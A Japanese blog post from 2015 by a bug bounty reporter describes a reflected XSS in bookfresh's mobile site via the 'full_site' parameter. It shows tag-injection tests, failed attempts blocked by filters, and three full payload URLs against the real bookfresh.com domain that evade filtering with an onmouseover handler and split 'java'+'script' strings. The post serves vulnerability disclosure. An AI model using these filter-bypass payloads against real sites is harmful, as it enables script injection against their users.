bookfreshのXSSのはなし   no comments

Posted at 9:28 am in XSS

bookfreshのXSSを見つけて報告したけどDuplicateだったのでメモ。

モバイルサイトの方に反射型XSSがあったので報告しました。
便宜上FirefoxでUAをいじったものですが、Android版のFFで発動します。

ログインするとダッシュボードが表示されますが、ここには目もくれず
メニューの一番上の「Appointments」をクリックします。
いくつかまたメニューが表示されるのですが、それは置いといて一番下の
「Switch to Desktop Mode」というリンクがあります。

https://www.bookfresh.com/index.html?view=history&o=r&full_site=yes

みたいなURLですが、このfull_siteパラメータに問題があります。

とりあえず、
https://www.bookfresh.com/index.html?view=history&o=r&full_site=yes%22%3E%3Cs%3E
のようにyesの後ろに”><s>を付けてみますが特に何も起きません。

特に何も起きないのですが、メニューをクリックするとあら不思議。
打ち消し線が入っているのがわかります。

ソースを見るとエスケープされていないのがわかります。

なので、yes”><script>alert(0)</script>とかやってみますよね。
しかしながら<script>は[removed]になってしまいます。

つぎはyes” onmouseover=alert(0)//を試してみましょう。
alert&#40;0&#41;になってしまいます。

ギャー

ということで
https://www.bookfresh.com/index.html?view=merchant_accept_decline&id=f636e80330a24850e170cc08bd80c715&enable=1&done=view%3Dhistory%26o%3Dr%26full_site%3Dyes%2522%2520onmouseover%3Dlocation%3D%2527java%2527%2B%2527script\x3aal%2527%2B%2527ert%26%2340%3B0%26%2341%3B%2527%2F%2F&done_name=Reservations

https://www.bookfresh.com/index.html?view=merchant_accept_decline&id=f636e80330a24850e170cc08bd80c715&enable=1&done=view%3Dhistory%26o%3Dr%26full_site%3Dyes%2527%3B%2522%253E%253Cs%253C%2Fscript%253E%2520onmouseover%3Dlocation%3D%2527java%2527%2B%2527script\x3aal%2527%2B%2527ert\x28location\x29%2527%2F%2F&done_name=Reservations

https://www.bookfresh.com/index.html?view=merchant_accept_decline&id=f636e80330a24850e170cc08bd80c715&enable=1&done=view%3Dhistory%26o%3Dr%26full_site%3Dyes%2527%3B%2522%253E%253Cs%2520onmouseover%3Dlocation%3D%2527java%2527%2B%2527script\x3aal%2527%2B%2527ert\x28location\x29%2527%2F%2F&done_name=Reservations

Written by bogus on 5月 18th, 2015